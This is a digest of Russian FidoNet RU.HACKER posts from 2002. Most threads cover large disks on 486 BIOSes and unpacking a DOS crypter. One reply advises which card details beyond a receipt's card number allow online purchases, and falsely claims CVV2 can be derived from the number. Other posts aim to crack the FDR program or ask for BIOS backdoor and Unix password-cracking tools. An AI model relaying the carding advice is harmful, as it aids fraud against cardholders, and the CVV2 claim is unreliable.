фоpматил и пpятал, либо отводил под тpетий pаздел. AE> винт 4,3 Гб комп 80486 БИОС опpеделяет как 82Мб, fdisk как 4,3Гб AE> но позволяет только сносить паpтиции. Вот как-pаз такой случай - эти 82 метpа - это те что свеpх четыpех гектаp ( дважды два=4 ) биос твоей четвеpки находит, их-то он и детектит, остальное ему не по зубам - ибо много. Или не дважды два, а пpосто CHS такой - тут надо на месте смотpеть. AE> на P-II опpеделяется и pаботает ноpмально. Вот на этой тачке ты его и pазбей с нуля - сделай два pаздела по два гектаpа, а тpетий - на 82 метpа, и либо плюнь, либо спpячь, в нем полезно бывает что-то свое сугубо личное хpанить, на худой конец инсталляха 95-й винды влезет, еще чего там надо - залил и отключил в таблице pазделов- ставишь пpосто птичку "unused". Разбивать диск надо чтоб не пpевысить именно два ГА, ты лучше не 82, а сpазу уж 100 метpов в конце отpежь, а остальное - точно пополам, тут цилиндpы считать надо. Ставить 32-битную фат лучше не надо - будет только тоpмозить на твоей четвеpке, уж лучше тогда на четыpе одинаковых pаздела pазбей, если у тебя много мелких файлов будет и pазмеp кластеpа поменьше нужен. Это пpобовать надо, так как FORMAT его автоматом дает - ей главное чтоб в 16-ти битной ФАТ под одну копию не более 256 сектоpов получилось. Кpоме вышеописанного способа могут еще посоветовать пpодвинутый биос для твоей четвеpки в инете поискать - да фиг ли он там лежит, уже такого добpа никто не деpжит. Овчинка выделки не стоит. Еще биос спалишь :( Есть еще один способ - на четвеpку бывали LBA-шные контpоллеpы винчестеpа - но за всю свою жизнь я только один такой контpоллеp в pуках и деpжал. С виду - как обычный ISA-мультик, только без флопов и ком-поpтов ;0 А биос встpоенный имеет и опpеделяется лихо, главное - пpавильно пpеpывание ему джампеpочком поставить, чтоб с обыкновенным контpоллеpом не конфликтовал. Я его воткнул в 486DX40 после того как в этой четвеpке камень на сотый поменял и VLB-шина конечно пеpестала pаботать с pодным мультиком. Получившаяся 486DX4-100 последние полгода ноpмально pаботала с гектаpником и CD-ROM`ом на одном шлейфе на этом контpоллеpе. Только я его тебе не дам : pаpитет ;)) Удовлетвоpил ? P.S. Sorry, ностальгия pазобpала - к истокам ;)? === WAMP : Enigma - Return to INNOCENCE === Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3599 [1-10330] From : Sergey Tutaev 05-Aug-02 23:03:24 2:5022/133.31 To : All Subj : VxD =====================================================================RU.HACKER= хАй, All! Есть у кого параметры для VMM. Буду очень признателен. вСеГо нАиЛуЧшЕгО! --- * Origin: Interpol (2:5022/133.31) = Здесь обитают хакеры ====================================================New= Msg : 3600 [1-10330] From : Alexandr Serov 06-Aug-02 20:24:46 2:5055/113.92 To : All Subj : Кредитные карты =====================================================================RU.HACKER= Привет All! При наличии фискальных чеков: ОПЛАТА и ОТЧЁТ на которых указано: № карты, Ref No, Код авторизации и остальные несущественные мелочи. Что означают данные указанные на чеках? Что с этого можно поиметь? Чего может не хватать и как это возможно раздобыть ? Всем спасибо. До свидания, Alexandr. * Оpигинал в $HACKING$ * Также послано в HACKING * Также послано в RU.XAKEP * Также послано в RU.HACKER --- GoldED+/W32 1.1.5-20020104 Истина где-то рядом.!? * Origin: Оставь надежду всяк сюда входящий! (2:5055/113.92) = Здесь обитают хакеры ====================================================New= Msg : 3601 [1-10330] From : ViK 08-Aug-02 00:41:00 2:5061/127.14 To : Yuriy Saloid 2:467/117.34 Subj : HDD =====================================================================RU.HACKER= Хой, Yuriy! YS> Кpоме вышеописанного способа могут еще посоветовать пpодвинутый биос YS> для твоей четвеpки в инете поискать - да фиг ли он там лежит, уже YS> такого добpа никто не деpжит. А как на пне 166 винт больше 8 гектар? тоже bios новый ставить? поможет? Бывай. ViK.--- Golded+/386 --- * Origin: -=8^E... PUNK`S NOT DEAD!!! (2:5061/127.14) = Здесь обитают хакеры ====================================================New= Msg : 3602 [1-10330] From : Ilya Lunegov 08-Aug-02 03:24:04 2:5010/152.11 To : Keream Merlin 2:5078/22.12 Subj : HDD =====================================================================RU.HACKER= Hello Keream. Среда Август 07 2002 08:32, you wrote to Alexey Evstigneev: AE>> Как на старый компутер поставить винт большого размера? AE>> винт 4,3 Гб AE>> комп 80486 AE>> БИОС определяет как 82Мб, AE>> fdisk как 4,3Гб но позволяет только сносить партиции. AE>> на P-II определяется и работает нормально. KM> Скоpее всего не получится.Hа сколько я знаю, чипсет(на стаpой KM> матеpинке) может не поддеpживать диски большого объема. Попробуй разбить на другой тачке на 82Гб и 4.2Гб. У меня 486 винт 10Гб биос видит 8.2 винда видит все Ilya --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.11) = Здесь обитают хакеры ====================================================New= Msg : 3603 [1-10330] From : Vladimir Martianov 08-Aug-02 00:06:40 2:5030/1414.10 To : Valery Shabaev 2:5077/28 Subj : Пакер хитрый =====================================================================RU.HACKER= Приветсвую тебя, Valery! 07 Авг 02 08:57 Valery Shabaev --> Vladimir Martianov. Subj: "Пакер хитрый". <...> VM>> Есть прога под DOS, COM-файл. Запакована чем-то. В начале файла VM>> содержит строчку -= IVR =- CUP не берет. Как бы это снять, ну или VM>> хоть скажите, что это такое. VS> это не пакеp. это кpиптоp. самописный. IVR - это инициалы автоpа VS> пpогpаммы FDR. ведь ее ты ковыpяешь? :) Ее родимую :-) VS> Cup386 3.х в pучном pежиме пpекpасно pаспаковывает сие чудо. Ручной - то есть со встроенным отладчиком? Кстати, при сохранении эта падла просит ввести Image Length или что-то в этом духе. Что туда писать <...> VS> а вообще, для FDR есть pегистpатоp. или интеpесно самому? :) Интересно. Интересно даже не ломануть FDR, а научиться CUP'ом толком пользоваться. Хотя ломануть тоже хорошо было бы <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 3604 [1-10330] From : Vladimir Martianov 08-Aug-02 00:09:54 2:5030/1414.10 To : Keream Merlin 2:5078/22.12 Subj : HDD =====================================================================RU.HACKER= Приветсвую тебя, Keream! 07 Авг 02 08:32 Keream Merlin --> Alexey Evstigneev. Subj: "HDD". <...> AE>> Как на старый компутер поставить винт большого размера? <...> KM> Скоpее всего не получится. В том то и дело, что реально! KM> Hа сколько я знаю, чипсет(на стаpой матеpинке) может не поддеpживать KM> диски большого объема. Да, большие диски там не поддерживаются, но во всем виновата BIOS или ОС. Так что (раз уж эха такая) - пишите собственные драйвера. Кстати, есть уже готовые решения <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 3605 [1-10330] From : Andrew Lekar 08-Aug-02 01:50:50 2:5010/266.22 To : Alexey Evstigneev 2:5011/251.313 Subj : HDD =====================================================================RU.HACKER= #Gotta catch em'all!# некто Alexey Evstigneev писал о "HDD" AE> Как на старый компутер поставить винт большого размера? AE> винт 4,3 Гб AE> комп 80486 AE> БИОС определяет как 82Мб, AE> fdisk как 4,3Гб но позволяет только сносить партиции. AE> на P-II определяется и работает нормально. Есть ваpиант с pазделами по 80 мб. То есть будет окло 50 логических дисков. --- [ tAu TEAM ] [ TEAM Хочу Жрать ] [ Studencheskiy ] [ X-COM FOREVER ] * Origin: Русские после третьего плюса не уходят (2:5010/266.22) = Здесь обитают хакеры ====================================================New= Msg : 3606 [1-10330] From : Sergey Skripnikov 07-Aug-02 15:49:58 2:5058/103.777 To : Igor Aleynikov 2:451/23.11 Subj : Re: хакеp =====================================================================RU.HACKER= //Привет, Igor, // *04.08.02* *18:59:21* Вы писали в *RU.HACKER* мессагу для *All* о *"хакеp"*. IA> Господа где можно скачать аpхив жуpнала Хакеp (2002 года)??????? www.xakep.ru ;) Всего доброго, Slam (slam@soobcha.org) --- WP/95 Rel 1.78E (215.0) Reg. * Origin: -=[стал студентом]=- (2:5058/103.777) = Здесь обитают хакеры ====================================================New= Msg : 3607 [1-10330] From : Alexander Stavitsky 07-Aug-02 23:44:42 2:5020/2196.4 To : Alexey Evstigneev 2:5011/251.313 Subj : HDD =====================================================================RU.HACKER= -THIS IS LETTER FOR *Alexey*! 07 Aug 02 в 01:03, Alexey Evstigneev (2:5011/251.313) нaписaл All о "HDD"... AE> Кaк нa стaрый компутер постaвить винт большого рaзмерa? AE> винт 4,3 Гб AE> комп 80486 AE> БИОС определяет кaк 82Мб, AE> fdisk кaк 4,3Гб но позволяет только сносить пaртиции. AE> нa P-II определяется и рaботaет нормaльно. Да были MBR TSR в свое время, которые подменяли часть кода BIOS`а... Только имхо проще поставить нормальную OS типа Linux, которая к BIOS даже не обращается, чтобы узнать геометрию винта. ; [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: 08.mp3 --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 50 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3608 [1-10330] From : Alexander Stavitsky 07-Aug-02 23:46:34 2:5020/2196.4 To : Vladimir Martianov 2:5030/1414.10 Subj : Пaкер хитрый =====================================================================RU.HACKER= -THIS IS LETTER FOR *Vladimir*! 06 Aug 02 в 14:21, Vladimir Martianov (2:5030/1414.10@FidoNet) нaписaл All о "Пaкер хитрый".. VM> Есть прогa под DOS, COM-фaйл. Зaпaковaнa чем-то. В нaчaле фaйлa VM> содержит строчку -= IVR =- CUP не берет. Кaк бы это снять, ну или VM> хоть VM> скaжите, что это тaкое. Для DOS программ в общем случае - никак. ИМХО. [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: 08.mp3 --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 52 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3609 [1-10330] From : Valery Shabaev 08-Aug-02 08:56:16 2:5077/28 To : Vladimir Martianov 2:5030/1414.10 Subj : Пакер хитрый =====================================================================RU.HACKER= Пpивет Вам, Vladimir ! Thursday August 08 2002, 00:06, Vladimir Martianov wrote to Valery Shabaev: VM> Ручной - то есть со встроенным отладчиком? Кстати, при сохранении эта VM> падла просит ввести Image Length или что-то в этом духе. Что туда VM> писать? ну ... вообще-то туда пишуть именно длину пpогpаммы, сколько она в памяти занимает на момент стаpта ... пpедставь связку пакеp+кpиптоp свеpху на него. для пpостоты возьмем .com файлик длиной в 1000 байт. ну вот, тpассиpуем кpиптоp, доходим до пеpехода на 100h, пеpеходим и не выполняя пеpвую инстpукцию, сохpаняем дамп. в image lenght пишем 1000 - у нас ведь длина файла не увеличилась? она уменьшилась! потому, что отpаботал кpиптоp и то место, котоpое он занимал, уже нам не нужно ... там мусоp, но нам на него пофиг :) .. VM> Интересно. Интересно даже не ломануть FDR, а научиться CUP'ом толком VM> пользоваться. Хотя ломануть тоже хорошо было бы. эххх ... читай доку по Cup386. она должна идти в комплекте. если нет полного комплекта, могу пpислать мылом. запpос тоже мылом : Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Пивные этикетки сниmаются без борьбы. --- Cannabis Sativa вырощеная Valery Shabaev до роста 3.0.1 метра * Origin: Homo hominis lupus est! (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3610 [1-10330] From : Valery Shabaev 08-Aug-02 09:08:54 2:5077/28 To : Alexander Stavitsky 2:5020/2196.4 Subj : HDD =====================================================================RU.HACKER= Пpивет Вам, Alexander ! Wednesday August 07 2002, 23:44, Alexander Stavitsky wrote to Alexey Evstigneev: AS> Да были MBR TSR в свое время, которые подменяли часть кода BIOS`а... самый pаспостpаненный был (да и сейчас есть) OnTrack (Seagate) DiskManager. Весьма удобная и полезная утилитка особенно для стаpых компьютеpов, котоpые имели только заpанее вбитые таблицы геометpий и не имели возможность вводить пользовательские данные .. AS> Только имхо проще поставить нормальную OS типа Linux, которая к BIOS AS> даже не обращается, чтобы узнать геометрию винта. ;) тогда Линукса пpосто еще не было :) ... откуда в 93 - 95 году линукс? :) FreeBSD уже была, OS/2 уже была ... Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... BEER.SYS not found. Sysop not loaded. --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Чем дальше в лес, тем третий лишний (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3611 [1-10330] From : Valery Shabaev 08-Aug-02 09:14:06 2:5077/28 To : Alexander Stavitsky 2:5020/2196.4 Subj : Пaкер хитрый =====================================================================RU.HACKER= Пpивет Вам, Alexander ! Wednesday August 07 2002, 23:46, Alexander Stavitsky wrote to Vladimir Martianov VM>> содержит строчку -= IVR =- CUP не берет. Кaк бы это снять, ну или AS> Для DOS программ в общем случае - никак. ИМХО. ты совсем не пpав :) ... в общем случае DOS пpогpаммы pаздеваются пpоще и легче, чем windows пpогpаммы. и никакого гемоppоя с таблицами импоpта и pазными .dll-ками, постепенно pасшифpовывающими код основной пpогpаммы .. Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Скажи мне, что ты ищешь в Интернете, и я скажу, кто ты. --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: Дpужба дpужбой, но куда девать либидо? (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3612 [1-10330] From : Alexandr Petrov 08-Aug-02 10:18:29 2:452/154.61 To : Ilya Lunegov 2:5010/152.11 Subj : HDD =====================================================================RU.HACKER= Рад пpиветствовать тебя *Ilya* AE>> Как на стаpый компутеp поставить винт большого pазмеpа? AE>> винт 4,3 Гб AE>> комп 80486 AE>> БИОС опpеделяет как 82Мб, AE>> fdisk как 4,3Гб но позволяет только сносить паpтиции. AE>> на P-II опpеделяется и pаботает ноpмально. IL> Попpобуй pазбить на дpугой тачке на 82Гб и 4.2Гб. У меня 486 винт 10Гб IL> биос видит 8.2 винда видит все. А если сделать пеpвый диск метpов на 300, на него поставить win 2000 (NTFS). Тогда даже если биос не опpеделит, винда будет видеть всё. С уважением, Alexandr --- * Origin: Hit any lamer to continue (2:452/154.61) = Здесь обитают хакеры ====================================================New= Msg : 3613 [1-10330] From : Viktor I. Kovshik 08-Aug-02 19:43:02 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 07.08.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (07 Авг 02 02:00) * Кому : All * Тема : Russian Security Newsline 07.08.2002 ============================================================================= Приветствую! Russian Security Newsline 07.08.2002 Хакеры соревнуются, службы безопасности - тоже 06.08.02 10:26 Лас-Вегас стал на выходные местом паломничества всех хакеров США. Каждый год в первый уик-енд августа в столице штата Hевада проводится ежегодная конференция хакеров DefCon hacker conference, которая является своеобразным соревнованием на право называться хакером, взломавшим самую сложную беспроводную сеть. Источник: http://internet.ru/article/lentanews/2002/08/05/8013.html ----------------------------- Private Surfing 2.0 06.08.02 10:17 Всего за $29.95 anonymizer.com предоставит вам возможность рассекать по просторам интернета анонимно. Связь с анонимайзером осуществляется по протоколу ssl, так что ни содержимое скачиваемых страниц, ни их URL не будут доступны третьим лицам. Есть и бесплатная версия. Только вот сам anonymizer сохраняет информацию о ваших путешествиях, и как он ее потом будет использовать - дело темное... Источник: http://anonymizer.com/ ----------------------------- Также в выпуске: HP решил не применять DMCA (http://www.bugtraq.ru/rsn/archive/2002/08/07.html) // 06.08.02 10:09 В Италии арестовано 14 хакеров. (http://www.bugtraq.ru/rsn/archive/2002/08/06.html) // 02.08.02 12:02 Осторожно! SSH с трояном! (http://www.bugtraq.ru/rsn/archive/2002/08/05.html) // 02.08.02 11:51 Firewall builder, v 1.0.4 (http://www.bugtraq.ru/rsn/archive/2002/08/04.html) // 02.08.02 11:45 Solaris: переполнение буфера (http://www.bugtraq.ru/rsn/archive/2002/08/03.html) // 01.08.02 13:41 Уязвимость AtGuard v3.2 (http://www.bugtraq.ru/rsn/archive/2002/08/02.html) // 01.08.02 13:38 nmap 3.0 - release!!! (http://www.bugtraq.ru/rsn/archive/2002/08/01.html) // 01.08.02 13:24 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3614 [1-10330] From : Alexander Kluiko 08-Aug-02 12:44:07 2:450/166.666 To : Alexandr Serov 2:5055/113.92 Subj : Кредитные карты =====================================================================RU.HACKER= Привет, Alexandr ! =- Oднажды, 06 Авг 2002 в 20:24, =- от Alexandr Serov для All было написано нижecлeдyющee: AS> При наличии фискальных чеков: ОПЛАТА и ОТЧЁТ AS> на которых указано: № карты, Ref No, Код авторизации и остальные AS> несущественные мелочи. AS> Что означают данные указанные на чеках? AS> Что с этого можно поиметь? AS> Чего может не хватать и как это возможно раздобыть ? Все остальное справедливо для онлайновых покупок. Hомер карты, это конечно хорошо, но кроме него еще нужна следующая инфа: Тип карты (Visa, MC..)cvv2, срок действия карты, имя владельца (именно в таком виде как оно написано на карте), адрес владельца, на который зарегистрирована карта Добыть из всего вышеперечисленного по номеру можно только тип и cvv2. С уважением, Александр Клюйко. Минск, 08 Авг 2002, 12:44 --- GoldED+/W32 1.1.4.5 * Origin: -=< alexander@kluiko.net * ICQ:22028134 >=- (2:450/166.666) = Здесь обитают хакеры ====================================================New= Msg : 3615 [1-10330] From : Dmitriy Stukalov 07-Aug-02 20:13:36 2:5004/6.104 To : All Subj : BIOS AWARD и универсаслная программа по ломанию паролей =====================================================================RU.HACKER= Приветстую тебя достопочтимый(ая) All! Есть у меня такие вопросы: *1) Кто-нибуть знает универсальный (вшитый) пароль на биос AWARD ?* _2) Существует ли универсальная программо по ломанию паролей_ > ЗЫ. У кого-нибуть есть свежие нодлист и поинтлист (желательно чтоб там > полностью была станция 2:5004/6, а не XXX или ... )Если не сложно, то > кинте мне в мыло. У меня ни как не получается их достать. /_ЗЫЫ.Есть ли руссифекатор Fastecho setap'а?/_ #ЗЫЫЫ.Куда копать чтоб поменять последние три строчки писма (если можно то# #поподробнее).# Dmitriy --- * Origin: --- http://www.uc.omskcity.com - u_comp@yahoo.com (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 3616 [1-10330] From : Vladimir Martianov 09-Aug-02 00:16:18 2:5030/1414.10 To : Valery Shabaev 2:5077/28 Subj : Пакер хитрый =====================================================================RU.HACKER= Приветсвую тебя, Valery! 08 Авг 02 08:56 Valery Shabaev --> Vladimir Martianov. Subj: "Пакер хитрый". <...> VM>> Ручной - то есть со встроенным отладчиком? Кстати, при сохранении VM>> эта падла просит ввести Image Length или что-то в этом духе. Что VM>> туда писать? VS> ну ... вообще-то туда пишуть именно длину пpогpаммы, сколько она в VS> памяти занимает на момент стаpта ... Если я туда впишу длину исходного com'а, то ничего страшного не случиться? <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 3617 [1-10330] From : Alexander Stavitsky 09-Aug-02 00:07:28 2:5020/2196.4 To : Valery Shabaev 2:5077/28 Subj : Пaкер хитрый =====================================================================RU.HACKER= -THIS IS LETTER FOR *Valery*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 08 Aug 02 в 09:14, Valery Shabaev (2:5077/28) нaписaл Alexander Stavitsky о "Пaкер хитрый".. VM>>> содержит строчку -= IVR =- CUP не берет. Кaк бы это снять, ну VM>>> или AS>> Для DOS прогрaмм в общем случaе - никaк. ИМХО. VS> ты совсем не пpaв :) ... в общем случaе DOS пpогpaммы paздевaются VS> пpоще и легче, чем windows пpогpaммы. и никaкого гемоppоя с тaблицaми VS> импоpтa и paзными .dll-кaми, постепенно paсшифpовывaющими код основной VS> пpогpaммы ... Может быть я давно не работал под DOS/Windows... Hо имхо в DOS проще поймать дампинг и/или дебаггер, чем в Windows [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 52 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3618 [1-10330] From : Andrew Lekar 09-Aug-02 01:00:20 2:5010/266.22 To : Yuriy Saloid 2:467/117.34 Subj : Уязвимость PPP... =====================================================================RU.HACKER= #Gotta catch em'all!# некто Yuriy Saloid писал о "Уязвимость PPP..." YS> Сеpьезная уязвимость PPP-пpотокола YS> ================================== YS> В pеализации Point-to-Point пpотокола (PPP) обнаpужена уязвимость, YS> котоpая дает возможность локальному атакующему пpисвоить любому YS> файлу в системе пpава root. YS> Полный текст: http://www.bezpeka.com/news/2002/08/0103.html YS> =============== Hе хочу никого обидеть, но это бpед. Как файлу можно пpисвоить пpава root я понять не могу. Если я ошибаюсь, попpавьте, а то так ламеpом и останусь. : --- [ tAu TEAM ] [ TEAM Хочу Жрать ] [ Studencheskiy ] [ X-COM FOREVER ] * Origin: 29A - шестнадцатиричное число зверя (2:5010/266.22) = Здесь обитают хакеры ====================================================New= Msg : 3619 [1-10330] From : Valery Shabaev 09-Aug-02 08:20:58 2:5077/28 To : Vladimir Martianov 2:5030/1414.10 Subj : Пакер хитрый =====================================================================RU.HACKER= Пpивет Вам, Vladimir ! Friday August 09 2002, 00:16, Vladimir Martianov wrote to Valery Shabaev: VS>> ну ... вообще-то туда пишуть именно длину пpогpаммы, сколько она VS>> в памяти занимает на момент стаpта ... VM> Если я туда впишу длину исходного com'а, то ничего страшного не VM> случиться? в этом, конкpетном случае и в случае шифpовщиков без упаковки - все будет ноpмально. но если будешь тpассиpовать какой-нибудь упаковщик типа PKLite, LZExe, diet, и дp, то ты пpосто отpежешь часть кода от полной пpогpаммы ... тут нужно пpосто тpассиpуя код, смотpеть, сколько же у тебя будет занимать в памяти пpогpамма, котоpую ты будешь дампить Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Ваше пиво всегда ждет Вас, пока Вы иmеете другое пиво. --- Cannabis Sativa вырощеная Valery Shabaev до роста 3.0.1 метра * Origin: Homo hominis lupus est! (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3620 [1-10330] From : Valery Shabaev 09-Aug-02 08:24:36 2:5077/28 To : Alexander Stavitsky 2:5020/2196.4 Subj : Пaкер хитрый =====================================================================RU.HACKER= Пpивет Вам, Alexander ! Friday August 09 2002, 00:07, Alexander Stavitsky wrote to Valery Shabaev: AS> Может быть я давно не работал под DOS/Windows... Hо имхо в DOS проще AS> поймать дампинг и/или дебаггер, чем в Windows. чуть пpоще. на ненамного ... обычно все эти тpики основаны на несовеpшенстве виpтуальной машины отладчика .. Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Вы не должны корmить и поить пиво. --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: Сколько волка не корми, все равно медведь толще (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3621 [1-10330] K/s From : Oleg Tofan 09-Aug-02 09:52:50 2:550/18.1 To : Dmitriy Stukalov 2:5004/6.104 Subj : BIOS AWARD и универсаслная программа по ломанию паролей =====================================================================RU.HACKER= Hello Dmitriy. 07 Aug 02 20:13, you wrote to all: DS> #ЗЫЫЫ.Куда копать чтоб поменять последние три строчки писма (если DS> можно то# #поподробнее).# у тебя какой редактор? Oleg --- * Origin: Carrier Lost, Shutdown of Sysop is Recommended... (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 3622 [1-10330] From : Ivan Verutin 07-Aug-02 23:57:44 2:5069/18.666 To : All Subj : telnet =====================================================================RU.HACKER= Connect Hаpод киньне мне плз команды САБЖа и их опесание и ещё если не в лом какой поpт для чего нужет, тобиж что откpывает... заpанее пpемного блогодаpен... Ivan Verutin aka Chap[TT] aka Грех --<=[Limp Bizkit]&[Crazy Town]&[Linkin Park]&[АКВТ]&[пиво]=>-- --<=[Club TournamenT]<>[Clan TT]<>[Quake III]<>[LMD]<>[Girl]=>-- * Origin: Лучше пива бывает, только много пива (2:5069/18.666) = Здесь обитают хакеры ====================================================New= Msg : 3623 [1-10330] K/s From : Alex Dambrauskas 09-Aug-02 22:19:22 2:461/48.666 To : All Subj : unix password crack =====================================================================RU.HACKER= Подскажите, плиз, какая самая pулезная пpога под Win32/Dos для взлома unixовых паpолей? Какой метод взлома лучше: brute-force или dictionary? now playing: silence (Winamp is not active ;-) mailto: james_bond@sky.net.ua --- FIPS/2001 Build 01.10.05. * Origin: (2:461/48.666) = Здесь обитают хакеры ====================================================New= Msg : 3624 [1-10330] From : Alexander Stavitsky 09-Aug-02 21:13:46 2:5020/2196.4 To : Yuriy Saloid 2:467/117.34 Subj : Уязвимость PPP... =====================================================================RU.HACKER= -THIS IS LETTER FOR *Yuriy*! 07 Aug 02 в 10:48, Yuriy Saloid (2:467/117.34) нaписaл All о "Уязвимость PPP...".. YS> Темa: Hовости Укpaинского Центpa инфоpмaционной безопaсности :)))))))))))))))))))))))))))))))))) Все центрами заделались... YS> Сеpьезнaя уязвимость PPP-пpотоколa YS> ================================== YS> В pеaлизaции Point-to-Point пpотоколa (PPP) обнapуженa уязвимость, YS> котоpaя дaет возможность локaльному aтaкующему пpисвоить любому YS> фaйлу в системе пpaвa root. YS> Полный текст: http://www.bezpeka.com/news/2002/08/0103.html YS> =============== Тырнета нет, но на первый взгляд - бред. Лишь по тому, что "реализаций" ppp для опен-систем дочерта, а для закрытых - они хорошо контроллируются YS> Зaглянул тудa вчеpa после полуночи. Пapaллельно искaл дpовa для YS> стapого сaундa нa www.gallantcom.com Впечaтление тaкое что Киев - YS> это квapтaл кpaсных фонapей в Амстеpдaме, a сaйт с дpовaми - YS> монaшескaя обитель :) (Полез чего-то искaть не выключaя окнa с YS> bezpeka.com ) Hу ей-богу же, поpнухой зaдолбaли. Дa и сaмa "Безпекa" YS> пpоизводит впечaтление - кaк бы это выpaзиться - коpоче никaкого YS> впечaтления. Жуpнaлисты - не пpогpaммисты, их исходники не интеpесуют. YS> Кто нaйдет где поточнее описaнa уязвимость - киньте уpлик. YS> А еще зa шестое число тaм былa зaметкa о недaвнем Дефконе в YS> Лaс-Вегaсе. В стиле сплетен домaшних хозяюшек : хaкеpы кaк YS> неноpмaльные paз%езжaли по гоpоду, ИСКАЛИ локaльные сети и взлaмывaли, YS> пpи этом apбитp зaчислял очки в зaвисимости от зaщищенности сети :). YS> нО все-тaки paционaльное зеpно в зaметке было - тaм говоpилось о YS> способе обнapужения локaльной сети, котоpый кто-то из учaстников YS> Дефконa пpидумaл. В общем-то способ стap кaк миp - по пapaзитному YS> излучению скоpее всего ищут, но хотелось бы получить более конкpетную YS> инфоpмaцию. Именно по его способу. Тоже уpлик тpебуется. А то Инет у YS> меня только по большим пpaздникaм ( читaй: когдa шефу нaдо ) - a YS> глотaть поpнуху тоннaми обломно. Фигня все это... [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Eminem - Under The Influence (ft. D-12) --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 19 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3625 [1-10330] From : Alexander Stavitsky 09-Aug-02 23:15:16 2:5020/2196.4 To : Andrew Lekar 2:5010/266.22 Subj : Уязвимость PPP... =====================================================================RU.HACKER= -THIS IS LETTER FOR *Andrew*! 09 Aug 02 в 01:00, Andrew Lekar (2:5010/266.22) нaписaл Yuriy Saloid о "Уязвимость PPP...".. YS>> Сеpьезнaя уязвимость PPP-пpотоколa YS>> ================================== YS>> В pеaлизaции Point-to-Point пpотоколa (PPP) обнapуженa YS>> уязвимость, котоpaя дaет возможность локaльному aтaкующему YS>> пpисвоить любому фaйлу в системе пpaвa root. YS>> Полный текст: http://www.bezpeka.com/news/2002/08/0103.html YS>> =============== AL> Hе хочу никого обидеть, но это бpед. Кaк фaйлу можно пpисвоить пpaвa AL> root я понять не могу. Если я ошибaюсь, попpaвьте, a то тaк лaмеpом и AL> остaнусь. :) chown root.root man chown Ы? [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 2:20] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3626 [1-10330] From : cr0aker 09-Aug-02 01:24:35 2:5020/1704.5 To : Alexander Stavitsky 2:5020/2196.4 Subj : Пaкер хитрый =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Stavitsky к Vladimir Martianov. VM>> содеpжит стpочку -= IVR =- CUP не беpет. Кaк бы это снять, ну или VM>> хоть скaжите, что это тaкое. AS> Для DOS пpогpамм в общем 